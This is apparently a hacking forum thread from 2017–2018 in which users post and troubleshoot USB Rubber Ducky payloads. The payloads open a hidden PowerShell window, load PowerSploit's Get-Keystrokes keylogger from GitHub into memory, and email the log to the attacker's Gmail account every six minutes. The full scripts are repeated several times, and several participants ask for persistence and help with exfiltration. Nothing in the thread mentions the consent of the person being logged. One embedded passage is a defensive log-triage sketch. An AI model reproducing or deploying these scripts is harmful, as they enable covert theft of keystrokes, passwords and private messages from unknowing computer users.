GunZofPeace Posted February 5, 2017

Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want the command to run. Here is the code:

    DELAY 500
    GUI r
    DELAY 50
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 100
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 300
    STRING Get-Keystrokes -LogPath C:\Users\Garrett\Desktop\testing123.txt -Timeout 1
    ENTER

Of course, go to the www.ducktoolkit.com and encode it. Comment any suggestions / thoughts! I will be posting more scripts as I go. Also, I am working on a script to email the keylog file to your email. Will upload once I get that working. Hope you enjoy!

GunZofPeace (Author) Posted February 5, 2017

Well yeah, yours has persistence and a lot of other parameters. Which is easily done through powershell! Mine's a very simple and basic one! Great script by the way.

Speed09 Posted March 3, 2017

Nice script! I will give it a try. But to exfiltrate the log file you can make a simple ps script that emails (or POSTs to a web server) the content of the file every X minutes. I'm not good at ps but I think it's possible.

Mike Jamieson Posted March 8, 2017

Would love to see this script have the ability to output the results via email.

Speed09 Posted March 8, 2017 (edited)

I'm not good at powershell at all, but I managed to get the exfiltrate working. I simply modified the payload to run a ps script from my server that will send me the log file via email. Here is the final ducky script:

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 1500
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 400
    STRING Get-Keystrokes -LogPath $env:temp\key.txt
    ENTER
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1')
    ENTER

And here is the mail.ps1 content:

    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass')
    $ReportEmail = New-Object System.Net.Mail.MailMessage
    $ReportEmail.From = 'youradress@gmail.com'
    $ReportEmail.To.Add('youradress@gmail.com')
    $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
    while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

Edited March 8, 2017 by Speed09

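Seen from the defender's side, the chain posted above leaves traces in three log sources: Sysmon process creation (event ID 1), PowerShell Script Block Logging (event ID 4104) and Sysmon network connections (event ID 3). The following triage sketch is an added example, not code from this thread; the host names, the sample events, the integer-parsed `DestinationPort` and the two-indicator threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict

# -WindowStyle and its abbreviations (-w, -win, ...) with the value Hidden or 1
HIDDEN = re.compile(r"(?i)\s-w[a-z]*\s+['\"]?(?:hidden|1)\b")
# In-memory download cradle: Invoke-Expression fed by WebClient.DownloadString
CRADLE = re.compile(r"(?is)\b(?:iex|invoke-expression)\b.*\bdownloadstring\b")
KEYLOG = re.compile(r"(?i)\bget-keystrokes\b")
MAIL_PORTS = {25, 465, 587}  # SMTP and mail submission ports

def is_powershell(ev):
    return ev.get("Image", "").lower().endswith(("\\powershell.exe", "\\pwsh.exe"))

def indicators(ev):
    """Return the set of indicator names matched by one event record."""
    hits = set()
    # Sysmon 1 carries CommandLine; PowerShell 4104 carries ScriptBlockText.
    text = ev.get("CommandLine", "") + ev.get("ScriptBlockText", "")
    if ev["EventID"] == 1 and is_powershell(ev) and HIDDEN.search(text):
        hits.add("hidden_window")
    if ev["EventID"] in (1, 4104):
        # Commands typed into an already-open console never reach a process
        # command line, so the cradle is often visible only in event 4104.
        if CRADLE.search(text):
            hits.add("download_cradle")
        if KEYLOG.search(text):
            hits.add("keylogger_function")
    if ev["EventID"] == 3 and is_powershell(ev) and ev.get("DestinationPort") in MAIL_PORTS:
        hits.add("powershell_smtp")
    return hits

def triage(events):
    """Group matched indicators by host; hosts with no match are omitted."""
    by_host = defaultdict(set)
    for ev in events:
        by_host[ev["Computer"]] |= indicators(ev)
    return {host: found for host, found in by_host.items() if found}

def escalate(events, threshold=2):
    """Hosts showing at least `threshold` distinct indicators."""
    return sorted(h for h, found in triage(events).items() if len(found) >= threshold)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not real telemetry); DestinationPort assumed parsed to int
SAMPLE = [
    {"EventID": 1, "Computer": "WS-042", "Image": PS, "CommandLine": "powershell -WindowStyle hidden"},
    {"EventID": 4104, "Computer": "WS-042", "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"},
    {"EventID": 4104, "Computer": "WS-042", "ScriptBlockText": r"Get-Keystrokes -LogPath $env:temp\key.txt"},
    {"EventID": 3, "Computer": "WS-042", "Image": PS, "DestinationPort": 587},
    {"EventID": 1, "Computer": "WS-013", "Image": PS, "CommandLine": r"powershell.exe -WindowStyle Hidden -File C:\Scripts\inventory.ps1"},
    {"EventID": 1, "Computer": "WS-007", "Image": PS, "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"EventID": 3, "Computer": "WS-007", "Image": r"C:\Program Files\Mail\OUTLOOK.EXE", "DestinationPort": 587},
]
print(escalate(SAMPLE))
```

A hidden window on its own (WS-013) is common in scheduled administrative scripts, which is why the sketch escalates only when a host shows several indicators together.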
Mike Jamieson Posted March 8, 2017

How often will the results of the keylogger be sent to your email?

Speed09 Posted March 8, 2017

29 minutes ago, Mike Jamieson said:
> How often will the results of the keylogger be sent to your email?

Every 360sec. But you can change it.

Mike Jamieson Posted March 8, 2017

Thank you. One last question, how would you disable this script?

Speed09 Posted March 8, 2017

5 minutes ago, Mike Jamieson said:
> Thank you. One last question, How would you disable this script?

By simply shutting down the computer. Since the script is loaded in memory, I also think that logout should kill it. Have a try!

Mike Jamieson Posted March 8, 2017

First off I want to thank you for providing educational content to the community. I purchased the USB Rubber Ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See below the IP address of my server, which I changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSD into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well, which obviously I changed myemail to my actual email@gmail.com with password.

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 1500
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 400
    STRING Get-Keystrokes -LogPath $env:temp\key.txt
    ENTER
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
    ENTER

    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
    $ReportEmail = New-Object System.Net.Mail.MailMessage
    $ReportEmail.From = 'myemail'
    $ReportEmail.To.Add('myemail')
    $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
    while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

Any insight would be GREATLY appreciated.

Mike Jamieson Posted March 9, 2017

Does anyone else have any ducky keylogger scripts they would like to share? I sure wish Hak5 would produce a win10 ducky keylogger script with gmail/pastebin output results for the community!

henna3 Posted March 9, 2017

21 hours ago, Mike Jamieson said:
> First off I want to thank you for providing educational content to the community. I purchased the USB Rubber Ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory, is that the correct directory? See below the IP address of my server, which I changed for security purposes, but is the same IP number format url. Finally I encoded the ducky script using ducky decoder and uploaded the inject.bin file to usb flash drive then put the microSD into the duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well, which obviously I changed myemail to my actual email@gmail.com with password.
>
>     DELAY 2000
>     GUI r
>     DELAY 500
>     STRING powershell -WindowStyle hidden
>     ENTER
>     DELAY 1500
>     STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
>     ENTER
>     DELAY 400
>     STRING Get-Keystrokes -LogPath $env:temp\key.txt
>     ENTER
>     DELAY 200
>     GUI r
>     DELAY 300
>     STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
>     ENTER
>
>     $SMTPServer = 'smtp.gmail.com'
>     $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
>     $SMTPInfo.EnableSsl = $true
>     $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
>     $ReportEmail = New-Object System.Net.Mail.MailMessage
>     $ReportEmail.From = 'myemail'
>     $ReportEmail.To.Add('myemail')
>     $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
>     while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}
>
> Any insight would be GREATLY appreciated.

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 1500
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 400
    STRING Get-Keystrokes -LogPath $env:temp\key.log
    ENTER
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
    ENTER

    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
    $ReportEmail = New-Object System.Net.Mail.MailMessage
    $ReportEmail.From = 'myemail'
    $ReportEmail.To.Add('myemail')
    $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
    while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360}

I have absolutely no idea if this will fix the problem for you, but it worked for me. Simply changed the key.txt to key.log. Hope it works for you too!

Mike Jamieson Posted March 9, 2017

Thank you so much for the response! I'll give this a try and report back.

Mike Jamieson Posted March 9, 2017

Well, I finally got it to work using the original script from Speed09! I'm ecstatic. I changed my web hosting to a free shared account (https://www.000webhost.com/) and it worked. I'm also noticing that I'm receiving results from hours ago, which makes me believe it was working all along. Gmail was blocking the sign in from the script because it was viewed as a less secure app, and I finally got a notification to allow the sign in attempt. I'm noticing that the results appear in single character results, which makes it very difficult to actually comprehend what is being typed. Do you use any tools to organize the results? Thank you so much for the help!! Just know you made someone's day and helped ignite my interest in security.

Speed09 Posted March 9, 2017

39 minutes ago, Mike Jamieson said:
> well I finally got it to work using the original script from Speed09! I'm ecstatic. I changed my web hosting to a free shared account (https://www.000webhost.com/) and it worked, I'm also noticing that I'm receiving results from hours ago which makes me believe it was working all along. Gmail was blocking the sign in from the script because it was viewed as a less secure app, and I finally got a notification to allow the sign in attempt. I'm noticing that the results appear in single character results which makes it very difficult to actually comprehend what is being typed. Do you use any tools to organize the results? Thank you so much for the help!! Just know you made someone's day and helped ignite my interest in security.

Yeah I forgot to mention that you'll have to turn on less secure app settings. For the results, it doesn't bother me much to view the results one character at a time. But if you want to view it online, feel free to change the script :)

Mike Jamieson Posted March 15, 2017

Hey guys, does anyone have a persistent keylogger script that will still run regardless if the user logs off or shuts down their computer?

Anonymoose Posted October 17, 2017

So I have most of this working, but when it sends the emails, it is not updating the keylogger. I am just getting the same thing back. Can anyone help?

AHoxha19 Posted January 16, 2018

On 17/10/2017 at 2:43 AM, Anonymoose said:
> So I have most of this working but when it sends the emails, it is not updating the keylogger I am just getting the same thing back can anyone help?

I have the same issue and don't know if you found the answer. Does anyone have a solution for this?

mrskannk Posted January 17, 2018

I'm getting the same issue. I'm getting empty email with Speed09's script.

PoSHMagiC0de Posted January 18, 2018

Sold Ducky and use a BB, but not that much difference, and I follow on the forums wherever I see Powershell. So, looking at this script, it is going to send the same attachment over again every 30 seconds, just it may get bigger each time? You may want to rename log file, if keylogger is not locking it, then send it and then remove that copy so it is different each time. Or if you do not want to send the file itself, still rename but get-content the contents of the file as the body of the email and send. Just some ideas. :-)

cryptolab Posted January 18, 2018

Hi guys, why am I seeing this error?

    Windows PowerShell
    Copyright (C) 2016 Microsoft Corporation. All rights reserved.

    PS C: \ Users \ crypt> IEX (New-Object Net.WebClient) .DownloadString ('http://nviia.altervista.org/mail.ps1')
    Exception during the "Send" call with "1" argument (s): "The SMTP server requires a secure connection or the client has not been authenticated. Server Response: 5.5.1 Authentication Required. Learn more at "
    In line: 9 car: 60
    + ... chments.Add ("$ ENV: temp \ key.log"); $ SMTPInfo.Send ($ ReportEmail); sleep 3 ...
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo: NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId: SmtpException
    Exception during the "Send" call with "1" argument (s): "The SMTP server requires a secure connection or the client has not been authenticated. Server Response: 5.5.1 Authentication Required. Learn more at "
    In line: 9 car: 60
    + ... chments.Add ("$ ENV: temp \ key.log"); $ SMTPInfo.Send ($ ReportEmail); sleep 3 ...
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo: NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId: SmtpException
    Exception during the "Send" call with "1" argument (s): "The SMTP server requires a secure connection or the client has not been authenticated. Server Response: 5.5.1 Authentication Required. Learn more at "
    In line: 9 car: 60
    + ... chments.Add ("$ ENV: temp \ key.log"); $ SMTPInfo.Send ($ ReportEmail); sleep 3 ...
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo: NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId: SmtpException

mrskannk Posted March 3, 2018

On 09/03/2017 at 7:53 PM, henna3 said:
>     DELAY 2000
>     GUI r
>     DELAY 500
>     STRING powershell -WindowStyle hidden
>     ENTER
>     DELAY 1500
>     STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
>     ENTER
>     DELAY 400
>     STRING Get-Keystrokes -LogPath $env:temp\key.log
>     ENTER
>     DELAY 200
>     GUI r
>     DELAY 300
>     STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
>     ENTER
>
>     $SMTPServer = 'smtp.gmail.com'
>     $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
>     $SMTPInfo.EnableSsl = $true
>     $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
>     $ReportEmail = New-Object System.Net.Mail.MailMessage
>     $ReportEmail.From = 'myemail'
>     $ReportEmail.To.Add('myemail')
>     $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
>     while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360}

I'm still getting empty emails with this. Does anyone see anything that could help :D

The Modern Mind Posted April 8, 2018

I really wish I could get this to work. Emails arrive, they're just empty.

mrskannk Posted April 25, 2018

On 3/8/2017 at 6:57 AM, Speed09 said:

I'm still looking for the solution. Same as "The Modern Mind": getting empty mails. Does anyone have a working script or know what's wrong with the last one?

DancinRick007 Posted April 26, 2018

Hi guys. I am an absolute newbie, but I am interested in finding out whether you can execute an attack on a macbook pro, for instance, without knowing the start up password. Can anyone tell me if that is possible, or do you have to know the log on details before any attempt is made?